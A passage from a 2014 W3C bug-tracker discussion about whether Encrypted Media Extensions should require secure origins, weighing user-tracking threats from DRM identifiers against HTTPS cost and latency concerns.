1) The user clears caches, cookies, etc., and changes the IP address after having visited a particular site that uses EME. Then the user comes back to the site. The site correlates this new visit with the previous visit using an identifier exposed by the Key System.

2) The user visits site A and site B that both use the same CDM. Sites A and B collude on the server-side to compare their notes of Key System-exposed identifiers and correlate the visit to site A and to site B as coming from the same user.

3) The user visits an EME-using site multiple times and a passive eavesdropper on the network correlates these visits as coming from the same user by observing a Key System-exposed identifier in the network traffic.

4) The user visits multiple sites that use the same CDM and a passive eavesdropper on the network correlates these visits as coming from the same user by observing a Key System-exposed identifier in the network traffic.

5) The user visits an EME-using site multiple times and/or visits multiple same-CDM-using sites and an active attacker on the network injects additional uses of the CDM into the site(s) such that the injected uses of the CDM speak the Key System protocol with a server that the attacker controls in order for the attacker to correlate these visits as coming from the same user by observing a Key System-exposed identifier as decoded from the protocol by the attacker-controlled implementation of the Key System protocol.

6) The user visits a non-EME-using site multiple times and/or visits multiple non-EME-using sites and an active attacker on the network injects uses of the CDM into the sites that otherwise wouldn't use EME such that the injected uses of the CDM speak the Key System protocol with the server that the attacker controls in order for the attacker to correlate these visits as coming from the same user by observing the Key System-exposed identifier as decoded from the protocol by the attacker-controlled implementation of the Key System protocol.

Which ones of these attacks is this bug about defending against? Are there additional attacks that this bug is about? Which ones of these attacks are CDMs deployed in IE, Chrome and Safari currently vulnerable to? What about the CDM that Opera demoed for "devices"?

Salting the identifiers with browser-provided salt that the user can instruct the browser to forget along with cookies addresses attack #1 and can incidentally happen to foil attack #3 at some point in time.

Salting the identifiers with per-origin browser-provided salt addresses attacks #2 and #4.

(Mozilla's announced plan includes salting with the characteristics described in the two above paragraphs/sentences.)

The Key System protocol encrypting messages from the CDM to the key server such that only the key server can decrypt identifiers and encrypting messages from the key server to the CDM in such a way that the encrypted messages don't reveal the identity of a unique-per-CDM-instance key with which they can be decrypted addresses attacks #3 and #4. (The latter could be achieved by not declaring any sort of key identity so that the only way to know if you have the right key is to try decryption or by having an outer layer of encryption that decrypts with the key that's common to a large number of CDM instances.)

Prompting the user to authorize the use of CDM on a per-site basis addresses attack #6 if the user has a good  grasp of what capabilities site is supposed to need and could address attacks #1 and #2 in cases where the CDM is only invoked for tracking purposes and there isn't actually any media on the sites that the user wants to play and the user has a good grasp of what capabilities a site with no media that the user wants to play is supposed to need.

Restricting EME secure origins only would address attacks #5 and #6 and, if mixed-content XHR and Web Sockets are blocked, attacks #3 and #4 as well.

As far as I can tell, the main reason against restricting EME to secure origins only would be that it would make it harder for sites that don't already use secure origins to migrate from NPAPI-based DRM to EME-based DRM. How serious is this issue?
Comment 49 Joe Steele 2014-08-21 19:09:06 UTC
(In reply to Ryan Sleevi from comment #47)
> (In reply to Joe Steele from comment #46)
> As a reminder, it's an entirely orthogonal issue as to whether two SITES
> receive the same identifier. An attacker in a privileged position on the
> network (as we have strong evidence of a number of nation-states and hostile
> entities being just that) can exploit a single site to obtain a persistent
> identifier to track that user as they browse and navigate.

I agree with you here. But trying to mitigate against this attack by THESE attackers by requiring SSL is like adding a deadbolt to your front door when the backdoor is a screen. SSL has its uses, but against a dedicated attacker it is easy to work around. I can provide citations if you feel they are needed. 

> 
> When thinking about how best to protect privacy and security of users, our
> goal should not be the minimum possible ("how it is today"), but looking at
> how we can maximize this, while balancing risks ("how we SHOULD do it").
> Cookies have proven time and time again that we SHOULD do secure transports.

I agree here as well to a point. I think we need to balance the security benefit we would get from requiring secure origin on these APIs (IMO small) against the usability cost of this approach (IMO large). There is no perfect solution here. 

If we do end up requiring this, I think all browsers are going to have to drastically step up their game on handling of mixed-content applications and probably we will need to provide new mechanisms (outside of this spec) to allow this to be handled cleanly. 

(In reply to Henri Sivonen from comment #48)
> Which ones of these attacks is this bug about defending against? Are there
> additional attacks that this bug is about? Which ones of these attacks are
> CDMs deployed in IE, Chrome and Safari currently vulnerable to? What about
> the CDM that Opera demoed for "devices"?

Great questions. And my followup question would be -- how well would the fix this bug proposes mitigate against these attacks? 

> Prompting the user to authorize the use of CDM on a per-site basis addresses
> attack #6 if the user has a good  grasp of what capabilities site is
> supposed to need and could address attacks #1 and #2 in cases where the CDM
> is only invoked for tracking purposes and there isn't actually any media on
> the sites that the user wants to play and the user has a good grasp of what
> capabilities a site with no media that the user wants to play is supposed to
> need.

Prompting on a per-site basis may sound good, but the user experience is so poor around this (partly for the reasons you mention) that I don't see how it can work. 

> As far as I can tell, the main reason against restricting EME to secure
> origins only would be that it would make it harder for sites that don't
> already use secure origins to migrate from NPAPI-based DRM to EME-based DRM.
> How serious is this issue?

I don't believe that is the issue at all. IMO, the issue is that for performance reasons the media streams are not delivered via secure origins. If the app must be delivered from a secure origin, delivering the streams from an insecure origin will result in mixed-content messaging. This is generally a bad user experience. 

I am all in favor of having the app delivered from a secure origin (as I stated in comment 2) if this issue can be dealt with somehow. I have not seen a proposal for that yet.

From a DRM perspective, I don't really care whether the key server is on a secure origin or not. The additional encryption layer provides no additional security over what my CDM will already provide, but it doesn't cause any problems other than a performance degradation.
Comment 50 Mark Watson 2014-08-21 19:21:25 UTC
(In reply to Henri Sivonen from comment #48)
> 
> Restricting EME secure origins only would address attacks #5 and #6 and, if
> mixed-content XHR and Web Sockets are blocked, attacks #3 and #4 as well.
> 

Note that, except in the case that the attacker is an authorized user of the keysystem, #5 and #6 are addressed if - as discussed in the privacy section - the keymessages are encrypted to the server, which itself is authenticated by means of a server certificate.

Also, attacks equivalent to #5 and #6 are already generally possible without EME using fingerprinting, information stored on the client by the attacked site etc. Adding EME makes no difference provided the other mitigations for #1-#4 are in place.

> As far as I can tell, the main reason against restricting EME to secure
> origins only would be that it would make it harder for sites that don't
> already use secure origins to migrate from NPAPI-based DRM to EME-based DRM.
> How serious is this issue?

Commercial CDNs charge significantly more for HTTPS services than HTTP. Migrating a large amount of traffic from HTTP to HTTPS has significant capacity / re-engineering implications. There are also operational issues that negatively impact user experience. So it's a significant issue.
Comment 51 Mark Watson 2014-08-21 19:26:50 UTC
(In reply to Joe Steele from comment #49)
> (In reply to Ryan Sleevi from comment #47)
> > (In reply to Joe Steele from comment #46)
> > As far as I can tell, the main reason against restricting EME to secure
> > origins only would be that it would make it harder for sites that don't
> > already use secure origins to migrate from NPAPI-based DRM to EME-based DRM.
> > How serious is this issue?
> 
> I don't believe that is the issue at all. IMO, the issue is that for
> performance reasons the media streams are not delivered via secure origins.
> If the app must be delivered from a secure origin, delivering the streams
> from an insecure origin will result in mixed-content messaging. This is
> generally a bad user experience. 
> 

I believe mixed-content is often blocked completely - or it is isn't now it soon will me.

I expect the response to this proposal would be very different indeed if there was a solution where only the site was delivered over HTTPS but HTTP could still be used for the content, but I don't see any prospect of such a solution. As I understand it, requiring a secure origin for EME means both site and content must switch to HTTPS.
Comment 52 David Dorwin 2014-08-21 20:57:09 UTC
(In reply to Henri Sivonen from comment #48)
Thanks for writing this.

There is another attack, which you mentioned in your discussion of #6. I think we should consider it a separate attack:
7) A non-EME-using site (i.e. no reason to use protected media), ad network, etc. uses EME to obtain a "permanent" identifier.


Below is a rough analysis of potential solutions to each of the attacks.

Avoiding #1 requires the ability for the user to clear the identifier provided to the server. Many current DRM implementations do not support this.

Avoiding #2 requires providing different identifiers to each origin. Many, if not most, current DRM implementations do not support this.

Avoiding #3 and #4 require effectively anonymizing the identifier each time it is used and/or secure transport.

Avoiding #5 requires secure origin with mixed content enforcement or server verification (i.e. whitelisting) by the CDM.

Avoiding #6 may require the mitigations for #5, the mitigations for #2 to make it the same problem as #5, and/or user prompting to alert the user to the inappropriate use of the EME APIs. Note that the prompting should be considered ineffective in the presence of such an attacker when non-secure origins are supported.

Avoiding #7 requires alerting the user (i.e. via a prompt), server verification, and/or clearing such identifiers when other site data, such as cookies, is cleared.


> Which ones of these attacks is this bug about defending against?

I think its good to discuss all of them somewhere. I believe this bug is mostly about #3-#6.

> Which ones of these attacks are
> CDMs deployed in IE, Chrome and Safari currently vulnerable to? What about
> the CDM that Opera demoed for "devices"?

While all of those major browsers could potentially adequately address these attacks, especially on the desktop, there will be many other user agents using a variety of DRM implementations that do not do so. This is especially true of platform-based DRM, which tends to rely on a permanent unique identifier.
Comment 53 David Dorwin 2014-08-21 21:04:22 UTC
(In reply to Joe Steele from comment #49)
> Prompting on a per-site basis may sound good, but the user experience is so
> poor around this (partly for the reasons you mention) that I don't see how
> it can work. 

I think the number of sites using DRM that a user interacts with is likely to be small. Also, the UX issues can be mitigated. This issue is not unique to EME or even web APIs - native mobile apps also have per-app prompts to give users control.


(In reply to Mark Watson from comment #50)
> Note that, except in the case that the attacker is an authorized user of the
> keysystem, #5 and #6 are addressed if - as discussed in the privacy section
> - the keymessages are encrypted to the server, which itself is authenticated
> by means of a server certificate.

There is no such normative requirement in the spec, especially one that the user agent can verify or enforce. Even with encryption, the identifier must be effectively anonymized, which requires careful thought in the implementation. A secure origin is something that the user agent can enforce and verify instead of relying on the CDM vendor to do the right thing and do it correctly.

> Also, attacks equivalent to #5 and #6 are already generally possible without
> EME using fingerprinting, information stored on the client by the attacked
> site etc. Adding EME makes no difference provided the other mitigations for
> #1-#4 are in place.

I think its misleading to compare the identifiers DRM systems often use to fingerpriting or local storage. In the worst case, DRM systems exposes a permanent non-clearable cryptographic identifier tied to the hardware. Even reinstalling the OS (if possible) may not clear the identifier. This is much stronger than fingerprinting or local storage.

There are mitigations, but those are not normative either.

> Commercial CDNs charge significantly more for HTTPS services than HTTP.
> Migrating a large amount of traffic from HTTP to HTTPS has significant
> capacity / re-engineering implications. There are also operational issues
> that negatively impact user experience. So it's a significant issue.

The cost and other issues are something that will need to change as more of the web moves to HTTPS. EME is likely to be around long after that happens. There may be a slight overhead (see https://istlsfastyet.com/), but charging "significantly more" seems unreasonable. Maybe there is a market opportunity for some CDNs.
Comment 54 Ryan Sleevi 2014-08-21 21:19:18 UTC
(In reply to Mark Watson from comment #50)
> Commercial CDNs charge significantly more for HTTPS services than HTTP.
> Migrating a large amount of traffic from HTTP to HTTPS has significant
> capacity / re-engineering implications. There are also operational issues
> that negatively impact user experience. So it's a significant issue.

Let's not broadly generalize here.

We're actually seeing more and more commercial CDNs offer high-performance, secure, optimized TLS *for free* to their customers.

Both Amazon CloudFront and CloudFlare are two such examples.
Now, there is one particularly large CDN who continues to charge exceptionally high rates, under the claim that it's necessary because clients do not support TLS Server Name Indication.

I think we can assume that all such EME clients do support SNI, and we can always normatively require such (along with TLS 1.2) within the EME spec if there is any question or doubt about this.

As for the claims of SSL adding additional overhead or latency, I would encourage members to read http://tools.ietf.org/html/draft-mattsson-uta-tls-overhead-00 (for which an update is already being prepared), that looks at the practical real-world overhead and shows that it's virtually non-existent.

This is unquestionably a diversion from the main crux of this bug - which is whether a secure transport MUST (normatively) be required, due to the complex and potentially (and probable) privacy impact of EME - but if the argument is that TLS is not viable, well, the evidence at present is that this is not the case, and will continue to be even less of a viable argument over time.
Comment 55 Mark Watson 2014-08-21 21:23:27 UTC
(In reply to David Dorwin from comment #53)
> (In reply to Joe Steele from comment #49)
> > Prompting on a per-site basis may sound good, but the user experience is so
> > poor around this (partly for the reasons you mention) that I don't see how
> > it can work. 
> 
> I think the number of sites using DRM that a user interacts with is likely
> to be small. Also, the UX issues can be mitigated. This issue is not unique
> to EME or even web APIs - native mobile apps also have per-app prompts to
> give users control.
> 
> 
> (In reply to Mark Watson from comment #50)
> > Note that, except in the case that the attacker is an authorized user of the
> > keysystem, #5 and #6 are addressed if - as discussed in the privacy section
> > - the keymessages are encrypted to the server, which itself is authenticated
> > by means of a server certificate.
> 
> There is no such normative requirement in the spec, especially one that the
> user agent can verify or enforce. Even with encryption, the identifier must
> be effectively anonymized, which requires careful thought in the
> implementation. A secure origin is something that the user agent can enforce
> and verify instead of relying on the CDM vendor to do the right thing and do
> it correctly.

That's fine if the UA implementor and CDM vendor are distinct or not communicating with each other. But in the case that they are the same entity, or where the UA implementor feels they have been told enough about the CDM's operation, it's unnecessary to use a secure transport.

> 
> > Also, attacks equivalent to #5 and #6 are already generally possible without
> > EME using fingerprinting, information stored on the client by the attacked
> > site etc. Adding EME makes no difference provided the other mitigations for
> > #1-#4 are in place.
> 
> I think its misleading to compare the identifiers DRM systems often use to
> fingerpriting or local storage. In the worst case, DRM systems exposes a
> permanent non-clearable cryptographic identifier tied to the hardware.

I qualified my statement with a restriction to those DRMs that *don't* do that: Those that enable users to clear the identifier as per the privacy mitigations.

Those mitigations need to be in place because secure origins don't help with those attacks.

 Even
> reinstalling the OS (if possible) may not clear the identifier. This is much
> stronger than fingerprinting or local storage.
> 
> There are mitigations, but those are not normative either.

Well, since the whole thread is about introducing a normative requirement, we can explore making other things normative instead. Like I've said, I don't necessarily have a problem with saying "If conditions X, Y, Z do not hold, then secure transport MUST be used." It's the blanket requirement I object to, because it's unnecessary in many cases.

> 
> > Commercial CDNs charge significantly more for HTTPS services than HTTP.
> > Migrating a large amount of traffic from HTTP to HTTPS has significant
> > capacity / re-engineering implications. There are also operational issues
> > that negatively impact user experience. So it's a significant issue.
> 
> The cost and other issues are something that will need to change as more of
> the web moves to HTTPS. EME is likely to be around long after that happens.
> There may be a slight overhead (see https://istlsfastyet.com/), but charging
> "significantly more" seems unreasonable. Maybe there is a market opportunity
> for some CDNs.

Sure. If all video traffic on the net migrates to HTTPS then there is probably also a market opportunity for optimized NICs*, solutions to operational problems, further optimizations to TLS speed, opportunities to short transparent proxy providers and to poach customers from ISPs who use them (whose networks are now toast). But you are talking about a five-year project here whilst proposing to enforce the requirement right now.

[* https://istlsfastyet.com/ says 'Good news is, modern hardware has made great improvements to help minimize these costs, and what once may have required additional hardware can now be done efficiently by the CPU.', but what if your data is not flowing through a CPU at the server ?]
Comment 56 Joe Steele 2014-08-21 22:01:30 UTC
(In reply to David Dorwin from comment #53)
> (In reply to Joe Steele from comment #49)
> > Prompting on a per-site basis may sound good, but the user experience is so
> > poor around this (partly for the reasons you mention) that I don't see how
> > it can work. 
> 
> I think the number of sites using DRM that a user interacts with is likely
> to be small. Also, the UX issues can be mitigated. This issue is not unique
> to EME or even web APIs - native mobile apps also have per-app prompts to
> give users control.

You are correct that this is not unique to EME. However in user testing we have seen significant falloff in completion rates in using any web application that requires a user opt-in to run. I think a normative requirement for this type of opt-in prior to using the API will result in very low usage of this API. I could be wrong though -- there could be some amazing UX out there for this I have not seen. But it is not in Chrome, Firefox, Internet Explorer or Opera. 


(In reply to Ryan Sleevi from comment #54)
> (In reply to Mark Watson from comment #50)
> As for the claims of SSL adding additional overhead or latency, I would
> encourage members to read
> http://tools.ietf.org/html/draft-mattsson-uta-tls-overhead-00 (for which an
> update is already being prepared), that looks at the practical real-world
> overhead and shows that it's virtually non-existent.

The overhead is not zero. And when you are having large numbers of transactions compressed into a small window the overhead can have a significant impact. Not to mention that SSL introduces additional failure modes as Mark mentioned earlier. 

> This is unquestionably a diversion from the main crux of this bug - which is
> whether a secure transport MUST (normatively) be required, due to the
> complex and potentially (and probable) privacy impact of EME - but if the
> argument is that TLS is not viable, well, the evidence at present is that
> this is not the case, and will continue to be even less of a viable argument
> over time.

I don't think we are arguing that TLS is not viable (at least I am not). I am arguing that HTTP with message-based encryption is equally viable and has certain advantages. We should allow implementations to leverage those advantages when they want to.

There is a good writeup on a weakness specific to SSL/TLS here -- http://www.thoughtcrime.org/blog/ssl-and-the-future-of-authenticity. 
Perhaps ironically, the tightly controlled message-based encryption used by many DRM are not subject to these issues and thus are more secure than SSL in this sense at least.
Comment 57 David Dorwin 2014-08-21 22:05:11 UTC
(In reply to Mark Watson from comment #55)
> (In reply to David Dorwin from comment #53)
> > (In reply to Mark Watson from comment #50)
> > > Note that, except in the case that the attacker is an authorized user of the
> > > keysystem, #5 and #6 are addressed if - as discussed in the privacy section
> > > - the keymessages are encrypted to the server, which itself is authenticated
> > > by means of a server certificate.
> > 
> > There is no such normative requirement in the spec, especially one that the
> > user agent can verify or enforce. Even with encryption, the identifier must
> > be effectively anonymized, which requires careful thought in the
> > implementation. A secure origin is something that the user agent can enforce
> > and verify instead of relying on the CDM vendor to do the right thing and do
> > it correctly.
> 
> That's fine if the UA implementor and CDM vendor are distinct or not
> communicating with each other. But in the case that they are the same
> entity, or where the UA implementor feels they have been told enough about
> the CDM's operation, it's unnecessary to use a secure transport.

Maybe, but are Netflix and other content providers going to offer HTTPS support for those UAs that feel secure transport is necessary? If not, the point above is moot because that would segment the web platform in an unacceptable way.

> > > Also, attacks equivalent to #5 and #6 are already generally possible without
> > > EME using fingerprinting, information stored on the client by the attacked
> > > site etc. Adding EME makes no difference provided the other mitigations for
> > > #1-#4 are in place.
> > 
> > I think its misleading to compare the identifiers DRM systems often use to
> > fingerpriting or local storage. In the worst case, DRM systems exposes a
> > permanent non-clearable cryptographic identifier tied to the hardware.
> 
> I qualified my statement with a restriction to those DRMs that *don't* do
> that: Those that enable users to clear the identifier as per the privacy
> mitigations.
> 
> Those mitigations need to be in place because secure origins don't help with
> those attacks.

Both #5 and #6 include "an active attacker on the network". Secure origins absolutely help with those attacks.

> > > Commercial CDNs charge significantly more for HTTPS services than HTTP.
> > > Migrating a large amount of traffic from HTTP to HTTPS has significant
> > > capacity / re-engineering implications. There are also operational issues
> > > that negatively impact user experience. So it's a significant issue.
> > 
> > The cost and other issues are something that will need to change as more of
> > the web moves to HTTPS. EME is likely to be around long after that happens.
> > There may be a slight overhead (see https://istlsfastyet.com/), but charging
> > "significantly more" seems unreasonable. Maybe there is a market opportunity
> > for some CDNs.
> 
> Sure. If all video traffic on the net migrates to HTTPS then there is
> probably also a market opportunity for optimized NICs*, solutions to
> operational problems, further optimizations to TLS speed, opportunities to
> short transparent proxy providers and to poach customers from ISPs who use
> them (whose networks are now toast). But you are talking about a five-year
> project here whilst proposing to enforce the requirement right now.

As the geolocation API has shown, we only get one chance to get it right.
> 
> [* https://istlsfastyet.com/ says 'Good news is, modern hardware has made
> great improvements to help minimize these costs, and what once may have
> required additional hardware can now be done efficiently by the CPU.', but
> what if your data is not flowing through a CPU at the server ?]

See Ryan's comment #54.
Comment 58 David Dorwin 2014-08-21 22:17:29 UTC
(In reply to Joe Steele from comment #56)
> (In reply to David Dorwin from comment #53)
> > (In reply to Joe Steele from comment #49)
> > > Prompting on a per-site basis may sound good, but the user experience is so
> > > poor around this (partly for the reasons you mention) that I don't see how
> > > it can work. 
> > 
> > I think the number of sites using DRM that a user interacts with is likely
> > to be small. Also, the UX issues can be mitigated. This issue is not unique
> > to EME or even web APIs - native mobile apps also have per-app prompts to
> > give users control.
> 
> You are correct that this is not unique to EME. However in user testing we
> have seen significant falloff in completion rates in using any web
> application that requires a user opt-in to run. I think a normative
> requirement for this type of opt-in prior to using the API will result in
> very low usage of this API. I could be wrong though -- there could be some
> amazing UX out there for this I have not seen. But it is not in Chrome,
> Firefox, Internet Explorer or Opera. 

(I'm interpreting "opt-in" as "prompt", but that may not be what you meant.)
Maybe users don't like what is being requested. In that case, the prompts are working as intended. (Admittedly, prompts are often ineffective for many users. That is a general problem that people are actively looking to address.)

I disagree that such a one-time prompt is going to prevent usage of EME by sites that wish to use DRM on the web platform.

Other APIs that normatively mention permissions appear to cover the permission request in the algorithm but make it optional in some way. This could also be motivation to implement/use a more user-friendly solution that does not need additional permission.

This is off topic, though. Maybe we should open a separate bug to continue discussion.
Comment 59 Mark Watson 2014-08-21 22:18:54 UTC
(In reply to David Dorwin from comment #57)
> (In reply to Mark Watson from comment #55)
> > (In reply to David Dorwin from comment #53)
> > > (In reply to Mark Watson from comment #50)
> > > > Also, attacks equivalent to #5 and #6 are already generally possible without
> > > > EME using fingerprinting, information stored on the client by the attacked
> > > > site etc. Adding EME makes no difference provided the other mitigations for
> > > > #1-#4 are in place.
> > > 
> > > I think its misleading to compare the identifiers DRM systems often use to
> > > fingerpriting or local storage. In the worst case, DRM systems exposes a
> > > permanent non-clearable cryptographic identifier tied to the hardware.
> > 
> > I qualified my statement with a restriction to those DRMs that *don't* do
> > that: Those that enable users to clear the identifier as per the privacy
> > mitigations.
> > 
> > Those mitigations need to be in place because secure origins don't help with
> > those attacks.
> 
> Both #5 and #6 include "an active attacker on the network". Secure origins
> absolutely help with those attacks.

I know. Let me take a step back. Attacks #1 and #2 are not mitigated by secure origin. Other mitigations as outlined in the privacy section need to be in place.

What I said was - assuming those mitigations are in place - then what's left of attacks #5 and #6 is no worse with EME than it is without EME. Specifically, I did not compare non-clearable identifiers to fingerprinting / local storage, I compared clearable, origin-specific, identifiers to those things.

> 
> > > > Commercial CDNs charge significantly more for HTTPS services than HTTP.
> > > > Migrating a large amount of traffic from HTTP to HTTPS has significant
> > > > capacity / re-engineering implications. There are also operational issues
> > > > that negatively impact user experience. So it's a significant issue.
> > > 
> > > The cost and other issues are something that will need to change as more of
> > > the web moves to HTTPS. EME is likely to be around long after that happens.
> > > There may be a slight overhead (see https://istlsfastyet.com/), but charging
> > > "significantly more" seems unreasonable. Maybe there is a market opportunity
> > > for some CDNs.
> > 
> > Sure. If all video traffic on the net migrates to HTTPS then there is
> > probably also a market opportunity for optimized NICs*, solutions to
> > operational problems, further optimizations to TLS speed, opportunities to
> > short transparent proxy providers and to poach customers from ISPs who use
> > them (whose networks are now toast). But you are talking about a five-year
> > project here whilst proposing to enforce the requirement right now.
> 
> As the geolocation API has shown, we only get one chance to get it right.
> > 
> > [* https://istlsfastyet.com/ says 'Good news is, modern hardware has made
> > great improvements to help minimize these costs, and what once may have
> > required additional hardware can now be done efficiently by the CPU.', but
> > what if your data is not flowing through a CPU at the server ?]
> 
> See Ryan's comment #54.

That doesn't really answer my point.

It's being argued here that migration to HTTPS is trivial, low cost, and therefore a reasonable thing to expect people to do when migrating from plug-ins to EME, even though the technical rationale is weak / restricted to CDMs that do not follow the privacy / security mitigations in the document (but nevertheless somehow get themselves integrated into a UA).

I'm disputing both that it is low-cost, particularly at scale, and that the mitigations in the document are insufficient.
Comment 60 Joe Steele 2014-08-21 22:20:13 UTC
(In reply to Joe Steele from comment #56)
> (In reply to Ryan Sleevi from comment #54)
> > (In reply to Mark Watson from comment #50)
> > As for the claims of SSL adding additional overhead or latency, I would
> > encourage members to read
> > http://tools.ietf.org/html/draft-mattsson-uta-tls-overhead-00 (for which an
> > update is already being prepared), that looks at the practical real-world
> > overhead and shows that it's virtually non-existent.
> 
> The overhead is not zero. And when you are having large numbers of
> transactions compressed into a small window the overhead can have a
> significant impact. Not to mention that SSL introduces additional failure
> modes as Mark mentioned earlier. 

I just read through this draft. It seems very thorough and I can't dispute the claims made. However -- I still don't think this is a good argument for requiring TLS on these APIs.

This quote in particular -- from the end of the draft:

   For everything but very short connections, TLS is not inducing any
   major traffic overhead (nor CPU or memory overhead).  Server people
   from Google Gmail has stated that "TLS accounts for less than 1% of
   the CPU load, less than 10 KB of memory per connection and less than
   2% of network overhead".  Main impact of TLS is increased latency,
   this can by reduced by using session resumption, cache information
   closer to end users, or waiting for TLS 1.3.

The key requests made by some DRMs fall exactly into this category of "very short connections". One packet out, one packet in. The overhead of negotiating an SSL channel (which may ultimately add nothing to the security) can be almost 100%. Even if we wait for TLS 1.3 as suggested. 

The increased latency mentioned could definitely cause a problem for media streams which are highly time sensitive - e.g. live sporting events. However the mitigations suggested do not seem like they would be effective for one-off connections to CDNs. This seems like it will require fairly major infrastructure improvements before it will be at the point that we can discard HTTP completely. 

Let's leave this proposed mitigation for a later version of the spec where the choice is not as painful.
Comment 61 Ryan Sleevi 2014-08-21 22:38:26 UTC
(In reply to Joe Steele from comment #60)
> The key requests made by some DRMs fall exactly into this category of "very
> short connections". One packet out, one packet in. The overhead of
> negotiating an SSL channel (which may ultimately add nothing to the
> security) can be almost 100%. Even if we wait for TLS 1.3 as suggested. 

Luckily, this is not a specification that deals with legacy DRM systems that are implemented inefficiently. Your CDM does not have a network connection (normatively), it defers to the UA to mediate all key exchanges.

It's amazing how exceedingly efficient UAs are. TLS session resumption. Connection pools. HTTP keep-alive. Novel technologies like XMLHttpRequest or WebSockets. All of these exist, and despite your "key exchange" or "drm" protocol being "one packet in, one packet out", it's nearly virtually impossible to actually find yourself establishing a new connection every time, or dealing with that overhead.

Equally, I think you'll be hard pressed to find a single EME/CDM implementation that's sending as many packets of video stream data as they're receiving, so you surely cannot mean that.

So, especially as demonstrated by browsers (and the updated version includes even more real world data from a variety of high-capacity sites), your overhead is virtually nil.

Also, I think the concerns about latency are a bit misinformed. Latency matters every bit as much for websites serving content as they do video providers. Milliseconds of latency are measured in impacts of millions of dollars. Seconds of latency are measured in billions. If the latency impact from SSL has not shown to be crippling online commerce, I think you can rest assured it won't compromise streaming either.

http://www.fastcompany.com/1825005/how-one-second-could-cost-amazon-16-billion-sales
Comment 62 Ryan Sleevi 2014-08-21 22:47:00 UTC
(In reply to Joe Steele from comment #56)
> I don't think we are arguing that TLS is not viable (at least I am not). I
> am arguing that HTTP with message-based encryption is equally viable and has
> certain advantages. We should allow implementations to leverage those
> advantages when they want to.

Frankly, this isn't the case of any of the DRM protocols that I've seen. Nor do the affordances of message-based encryption protocols, such as Netflix's description of their desire for WebCrypto over HTTP, meet the security standard expected by UAs (and our constituencies!) for user privacy and confidentiality.

Nor do I think we can argue that a robustly analyzed and audited protocol is somehow less desirable than individual vendors' home-grown protocols, for which it is a design goal of the product to make it difficult to analyze or reason about, and which short of the UAs individually implementing the protocol from scratch and auditing it, cannot have any assurances afforded even to the UA.

> 
> There is a good writeup on a weakness specific to SSL/TLS here --
> http://www.thoughtcrime.org/blog/ssl-and-the-future-of-authenticity. 
> Perhaps ironically, the tightly controlled message-based encryption used by
> many DRM are not subject to these issues and thus are more secure than SSL
> in this sense at least.

I suspect any refutal to this will verge so far off topic that we'll end up in the weeds. To the extent that I say I cannot let misinformation stand, I would say that the conclusion you reach is not at all supported by the article. Among the many reasons that this is, consider the most simplest response this: The public can audit the behaviour of CAs, and CAs business interests are aligned with promoting security (as the alternative is obsolence). The public CANNOT audit CDMs (as has been repeatedly established here that this be the outcome, even if the spec allows for hypothetically audited CDMs), and the business interests of CDMs is inherently geared towards creating a model of "too big to fail" (i.e. that they're an inextricable part of certain large media streaming sites, and as such, no UA can effectively disable or reject the CDM, for fear of breaking the experience for the users).

The rest we can save for a separate discussion in another forum, if it should somehow becomes necessary to show how a singular monolithic and opaque entity is worse than a diverse and robust competitive space with public audits and transparency.
Comment 63 David Dorwin 2014-08-21 22:48:39 UTC
(In reply to Mark Watson from comment #59)
> I know. Let me take a step back. Attacks #1 and #2 are not mitigated by
> secure origin. Other mitigations as outlined in the privacy section need to
> be in place.
> 
> What I said was - assuming those mitigations are in place - then what's left
> of attacks #5 and #6 is no worse with EME than it is without EME.
> Specifically, I did not compare non-clearable identifiers to fingerprinting
> / local storage, I compared clearable, origin-specific, identifiers to those
> things.

Are you arguing for possible option 2 or 3 in comment #0 or that we should normatively require the mitigations for attacks #1 and #2? The former still requires that Netflix and others support HTTPS for some of their traffic. The latter is not possible with many current DRM implementations (so you have the same transition issue).

> It's being argued here that migration to HTTPS is trivial, low cost, and
> therefore a reasonable thing to expect people to do when migrating from
> plug-ins to EME, even though the technical rationale is weak / restricted to
> CDMs that do not follow the privacy / security mitigations in the document
> (but nevertheless somehow get themselves integrated into a UA).

One concern is that flexibility will be abused (i.e. some applications will never support HTTPS, preventing user agents from ever enforcing it). A corollary is that the web platform may be segmented or some user agents may be forced to do the wrong thing if content providers do not support HTTPS. Maybe there are [non-spec] options for avoiding this while slowly ramping up the HTTPS traffic. However, as Ryan says, this is a diversion from the core issue. It's really related to smoothing the transition once the core issue has been resolved.
> 
> I'm disputing both that it is low-cost, particularly at scale, and that the
> mitigations in the document are insufficient.

Do you have a proposal for normative mitigation text? Maybe we should open a separate bug for that.
Comment 64 Joe Steele 2014-08-21 23:25:02 UTC
(In reply to Ryan Sleevi from comment #61)
> (In reply to Joe Steele from comment #60)
> > The key requests made by some DRMs fall exactly into this category of "very
> > short connections". One packet out, one packet in. The overhead of
> > negotiating an SSL channel (which may ultimately add nothing to the
> > security) can be almost 100%. Even if we wait for TLS 1.3 as suggested. 
> 
> Luckily, this is not a specification that deals with legacy DRM systems that
> are implemented inefficiently. Your CDM does not have a network connection
> (normatively), it defers to the UA to mediate all key exchanges.
> 
> It's amazing how exceedingly efficient UAs are. TLS session resumption.
> Connection pools. HTTP keep-alive. Novel technologies like XMLHttpRequest or
> WebSockets. All of these exist, and despite your "key exchange" or "drm"
> protocol being "one packet in, one packet out", it's nearly virtually
> impossible to actually find yourself establishing a new connection every
> time, or dealing with that overhead.

None of this efficiency makes any difference in this case. The CDM is constructing the request - which in our case is a single packet. The application can use any mechanism to send it it likes, but HTTP is good enough in our case and quite efficient. TLS would be overkill and not add anything to the security. 

> 
> Equally, I think you'll be hard pressed to find a single EME/CDM
> implementation that's sending as many packets of video stream data as
> they're receiving, so you surely cannot mean that.

I do not mean that. I am referring to the latency that will result from the CDN delivering the media stream having to re-encrypt each media segment for delivery.

> 
> So, especially as demonstrated by browsers (and the updated version includes
> even more real world data from a variety of high-capacity sites), your
> overhead is virtually nil.

No. The overhead in my case in particular is large if TLS is used. Less with the better algorithms described in that document, but still large relative to using HTTP. 

> 
> Also, I think the concerns about latency are a bit misinformed. Latency
> matters every bit as much for websites serving content as they do video
> providers. Milliseconds of latency are measured in impacts of millions of
> dollars. Seconds of latency are measured in billions. If the latency impact
> from SSL has not shown to be crippling online commerce, I think you can rest
> assured it won't compromise streaming either.

I will defer to folks who actually implement streaming of live video on that point. But I can say it has been raised as a serious concern by our customers in the past. We spend a significant amount of effort trying to reduce latency for our customers rather than increase it. 

(In reply to Ryan Sleevi from comment #62)
> (In reply to Joe Steele from comment #56)
> > I don't think we are arguing that TLS is not viable (at least I am not). I
> > am arguing that HTTP with message-based encryption is equally viable and has
> > certain advantages. We should allow implementations to leverage those
